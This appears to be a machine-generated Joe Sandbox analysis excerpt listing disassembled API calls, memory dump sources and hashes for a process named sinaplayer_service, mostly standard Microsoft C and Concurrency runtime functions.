                                                                                                                                                                                                    • ??0_ReentrantBlockingLock@details@Concurrency@@QAE@XZ.MSVCR120(00000004,6C574EF7,00000000,?,00000000), ref: 6C574CFB
                                                                                                                                                                                                      • Part of subcall function 6C575C29: __crtInitializeCriticalSectionEx.MSVCR120(?,00000000,00000180,6C574ACC,?,?,?,?,?,?,?,?,?,?,6C564938,000000FF), ref: 6C575C35
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001,00000004,6C574EF7,00000000,?,00000000), ref: 6C574D4C
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000002,00000001,00000004,6C574EF7,00000000,?,00000000), ref: 6C574D5B
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000003,00000002,00000001,00000004,6C574EF7,00000000,?,00000000), ref: 6C574D6A
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000005,00000003,00000002,00000001,00000004,6C574EF7,00000000,?,00000000), ref: 6C574D79
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000006,00000005,00000003,00000002,00000001,00000004,6C574EF7,00000000,?,00000000), ref: 6C574D88
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000008,00000006,00000005,00000003,00000002,00000001,00000004,6C574EF7,00000000,?,00000000), ref: 6C574D97
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000838), ref: 6C574E4D
                                                                                                                                                                                                      • Part of subcall function 6C55EE11: malloc.MSVCR120(?), ref: 6C55EE1A
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::HillClimbing.LIBCMT ref: 6C574E60
                                                                                                                                                                                                    • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR120 ref: 6C574E68
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6C574E85
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6C5A3476
                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000), ref: 6C5A347D
                                                                                                                                                                                                      • Part of subcall function 6C5758DA: __EH_prolog3.LIBCMT ref: 6C5758E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Concurrency@@$ElementKey@2@@Policy@SchedulerValue@$H_prolog3HillThread$??0_??2@BlockingClimbingClimbing::Concurrency::details::Count@CriticalCurrentInitializeLock@details@NodePriorityProcessorReentrantSection__crtmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1717548414-0
                                                                                                                                                                                                    • Opcode ID: 2b68b2bfb9d5f555797408353eeca851caae4892e204e6382bcfa5d40cb1b181
                                                                                                                                                                                                    • Instruction ID: ea5d732184277d0311df3924f38b6005b7161d2c51b1c982fb655587a74ab736
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b68b2bfb9d5f555797408353eeca851caae4892e204e6382bcfa5d40cb1b181
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7261F9B1B00A02EFD708CF39C955799FBA5BB89314F14822AD469C7B50DB70A864CF90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$__cftof
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 813615167-0
                                                                                                                                                                                                    • Opcode ID: ec5ec4bffb35308e86cc2a6cb88d80579915c7e9d7c4bfa3c8eb3da6a391d514
                                                                                                                                                                                                    • Instruction ID: 8e1daea9e76b5a133630c65a4a6f614edbcbfe06baeae29969d70396d30071c7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec5ec4bffb35308e86cc2a6cb88d80579915c7e9d7c4bfa3c8eb3da6a391d514
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22412A33400254DEC7249B7A9C909BF77A49FC6B38730074AE4709BEF0DB24D886C6A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB), ref: 0038998B
                                                                                                                                                                                                    • ??0DictionaryValue@base@@QAE@XZ.BASE ref: 003899A5
                                                                                                                                                                                                    • ?SetString@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0@Z.BASE(00000000,00000000,operation,00000009,0039D874,00000000), ref: 00389A13
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389A22
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389A4C
                                                                                                                                                                                                    • ?SetInteger@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@H@Z.BASE(00000000,?,os_error,00000008), ref: 00389A85
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389A9B
                                                                                                                                                                                                    • ?SetInteger@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@H@Z.BASE(00000000,?,net_error), ref: 00389AD4
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389AE3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@DictionaryValue@base@@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@Integer@$??2@D@2@@std@@0@String@
                                                                                                                                                                                                    • String ID: net_error$operation$os_error
                                                                                                                                                                                                    • API String ID: 2157804929-3557930716
                                                                                                                                                                                                    • Opcode ID: 7e6405687717c0dba998136e62f48913f1647c3cd9635320a4f737058316f7c0
                                                                                                                                                                                                    • Instruction ID: 129440d15e686b28da4c18b3e4c5329b123c98ab6b7c6bc9c9c2057faf04ee17
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e6405687717c0dba998136e62f48913f1647c3cd9635320a4f737058316f7c0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C4189B1D04248EBEF12DFA4C809BEEBFB4EB05724F144169E4167B2C1D7B91A48CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB), ref: 0038998B
                                                                                                                                                                                                    • ??0DictionaryValue@base@@QAE@XZ.BASE ref: 003899A5
                                                                                                                                                                                                    • ?SetString@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0@Z.BASE(00000000,00000000,operation,00000009,0039D874,00000000), ref: 00389A13
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389A22
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389A4C
                                                                                                                                                                                                    • ?SetInteger@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@H@Z.BASE(00000000,?,os_error,00000008), ref: 00389A85
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389A9B
                                                                                                                                                                                                    • ?SetInteger@DictionaryValue@base@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@H@Z.BASE(00000000,?,net_error), ref: 00389AD4
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00389AE3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@DictionaryValue@base@@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@Integer@$??2@D@2@@std@@0@String@
                                                                                                                                                                                                    • String ID: net_error$operation$os_error
                                                                                                                                                                                                    • API String ID: 2157804929-3557930716
                                                                                                                                                                                                    • Opcode ID: b2e936a97b9182548beb286cf092d29cf3d84a9279cc6b141b3b5e84db636a26
                                                                                                                                                                                                    • Instruction ID: 663f4be47e0c827659dd21a0a3ace6ba29e138677c6fe53da129332300bf0a7e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2e936a97b9182548beb286cf092d29cf3d84a9279cc6b141b3b5e84db636a26
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 174169B1D04248DFEF12DFA4C8097EEBFB4AB05324F1441A9E4057B2C1D7B91A48CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TlsAlloc.KERNEL32 ref: 6C576F16
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2045
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6C576C5D), ref: 6C5A205B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2069
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A206F
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6C576C5D), ref: 6C5A20B5
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,?,?,?,?,?,?,6C576C5D), ref: 6C5A20C3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,?,?,?,?,?,?,6C576C5D), ref: 6C5A20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6C576C5D), ref: 6C5A20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A20F3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastThrow$Version@$AllocConcurrency@@Manager@1@Resource
                                                                                                                                                                                                    • String ID: ]lWl
                                                                                                                                                                                                    • API String ID: 3870855575-3893419207
                                                                                                                                                                                                    • Opcode ID: 95814b48cf07fa0ee8fa701303b75b5ee0ac353b167386d8fe05e248984243c2
                                                                                                                                                                                                    • Instruction ID: 14a50e4b80144c94f61ec93f91f70846b900e8dc8939182bfc2507e3ed723f8a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95814b48cf07fa0ee8fa701303b75b5ee0ac353b167386d8fe05e248984243c2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 78112935600109EB8720EBF78C499EF7B6CBF81218B600915F909E2E54EB35C809CAF5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLogicalProcessorInformation.KERNEL32(00000000,6C630AA4,?,00000000,6C577B2D,0000FFFF,6C5A25E8,?,00000000,00000000,?,?,?,?,6C5758C9,00000004), ref: 6C5BEECD
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,6C577B2D,0000FFFF,6C5A25E8,?,00000000,00000000,?,?,?,?,6C5758C9,00000004,6C57692E), ref: 6C5BEED9
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,6C577B2D,0000FFFF,6C5A25E8,?,00000000,00000000,?,?,?,?,6C5758C9,00000004,6C57692E), ref: 6C5BEEE0
                                                                                                                                                                                                    • malloc.MSVCR120(?,00000000,6C577B2D,0000FFFF,6C5A25E8,?,00000000,00000000,?,?,?,?,6C5758C9,00000004,6C57692E), ref: 6C5BEEEE
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,00000001,00000000,6C577B2D,0000FFFF,6C5A25E8,?,00000000), ref: 6C5BEF0A
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,00000000,00000000,?,?,?,?,6C5758C9,00000004,6C57692E,?,00000000,?,6C5769B0,00000002), ref: 6C5BEF4C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6C62CF40,6C62CF40,?,?,00000000,00000000,?,?,?,?,6C5758C9,00000004,6C57692E,?,00000000), ref: 6C5BEF5A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionInformationLogicalProcessorThrowmallocstd::exception::exception
                                                                                                                                                                                                    • String ID: bad allocation$%Zl$%Zl
                                                                                                                                                                                                    • API String ID: 1610761817-3326429812
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTraceGuidsW), ref: 6C576D45
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,UnregisterTraceGuids), ref: 6C576D57
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,TraceEvent), ref: 6C576D6A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceLoggerHandle), ref: 6C576D7D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableLevel), ref: 6C576D90
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableFlags), ref: 6C576DA3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                                                    • String ID: GetTraceEnableFlags$GetTraceEnableLevel$GetTraceLoggerHandle$RegisterTraceGuidsW$TraceEvent$UnregisterTraceGuids
                                                                                                                                                                                                    • API String ID: 190572456-1576993034
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6C5C8CF3
                                                                                                                                                                                                      • Part of subcall function 6C5C87CF: __EH_prolog3.LIBCMT ref: 6C5C87D6
                                                                                                                                                                                                      • Part of subcall function 6C5C87CF: Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6C5C87ED
                                                                                                                                                                                                      • Part of subcall function 6C573AF4: TlsGetValue.KERNEL32(6C573DF7,00000000,00000000,?,?,?,?,?,?,?,6C564938,000000FF), ref: 6C573AFA
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6C5C8DA2
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6C5B7484,6C62CEB0), ref: 6C5C8DB7
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6C5C8DE6
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6C5C8E31
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6C5C8E5D
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6C5C8EDB
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,00000074), ref: 6C5C8F24
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??0exception@std@@$Base::Concurrency::details::Context$CancellationVisible$CreateExceptionH_prolog3H_prolog3_catchQueueThrowValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3898879344-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 0037578C
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375798
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003757A5
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003757BC
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003757F8
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375861
                                                                                                                                                                                                    • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP120(?), ref: 00375871
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375883
                                                                                                                                                                                                    • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003758A3
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 003758D0
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 00375907
                                                                                                                                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP120 ref: 0037595D
                                                                                                                                                                                                    • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP120(?), ref: 0037596D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?gptr@?$basic_streambuf@$?gbump@?$basic_streambuf@?pbump@?$basic_streambuf@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2796781305-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EventReset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2632953641-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _cimagf.LIBCMT(?,?), ref: 6C616881
                                                                                                                                                                                                    • _clogf.LIBCMT(?,?), ref: 6C616899
                                                                                                                                                                                                      • Part of subcall function 6C616155: _crealf.LIBCMT(?,?), ref: 6C616163
                                                                                                                                                                                                      • Part of subcall function 6C616155: _cimagf.LIBCMT(?,?,?,?), ref: 6C616171
                                                                                                                                                                                                      • Part of subcall function 6C616155: _fdtest.MSVCR120(?,?,?,?,?), ref: 6C61617D
                                                                                                                                                                                                      • Part of subcall function 6C616155: _fdtest.MSVCR120(?,?,?,?,?,?), ref: 6C616189
                                                                                                                                                                                                      • Part of subcall function 6C616155: __FCbuild.LIBCMT ref: 6C61635A
                                                                                                                                                                                                    • __FCmulcc.LIBCMT ref: 6C6168A6
                                                                                                                                                                                                      • Part of subcall function 6C6167B2: _crealf.LIBCMT(?,?,00000000,?,?,?), ref: 6C6167BE
                                                                                                                                                                                                      • Part of subcall function 6C6167B2: _cimagf.LIBCMT(?,?,?,?,00000000,?,?,?), ref: 6C6167CC
                                                                                                                                                                                                      • Part of subcall function 6C6167B2: _crealf.LIBCMT(00000000,?,?,?,?,?,00000000,?,?,?), ref: 6C6167DA
                                                                                                                                                                                                      • Part of subcall function 6C6167B2: _cimagf.LIBCMT(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?), ref: 6C6167E8
                                                                                                                                                                                                      • Part of subcall function 6C6167B2: __FCbuild.LIBCMT(?,?,?,?,?,?,00000000,?,?,?), ref: 6C61682A
                                                                                                                                                                                                    • _cexpf.LIBCMT(00000000,?,?,?,00000000,?,?,?), ref: 6C6168AD
                                                                                                                                                                                                      • Part of subcall function 6C615AA8: _crealf.LIBCMT(?,?), ref: 6C615AB5
                                                                                                                                                                                                      • Part of subcall function 6C615AA8: _cimagf.LIBCMT(?,?,?,?), ref: 6C615AC3
                                                                                                                                                                                                      • Part of subcall function 6C615AA8: _fdtest.MSVCR120(?,?,?,?,?), ref: 6C615ACF
                                                                                                                                                                                                      • Part of subcall function 6C615AA8: _fdtest.MSVCR120(?,?,?,?,?,?), ref: 6C615ADB
                                                                                                                                                                                                      • Part of subcall function 6C615AA8: __FCbuild.LIBCMT ref: 6C615C51
                                                                                                                                                                                                    • _cimagf.LIBCMT(?,?), ref: 6C6168BD
                                                                                                                                                                                                    • _crealf.LIBCMT(?,?), ref: 6C6168D9
                                                                                                                                                                                                    • _logf.LIBCMT ref: 6C6168E2
                                                                                                                                                                                                    • __FCmulcr.LIBCMT ref: 6C6168F0
                                                                                                                                                                                                    • _cexpf.LIBCMT(00000000,?,?,?,?), ref: 6C6168F7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _cimagf$_crealf$_fdtest$Cbuild$_cexpf$CmulccCmulcr_clogf_logf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3754504586-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE(8285FFAB), ref: 00375DA0
                                                                                                                                                                                                    • ?GetTempDir@base@@YA_NPAVFilePath@1@@Z.BASE(?), ref: 00375DB1
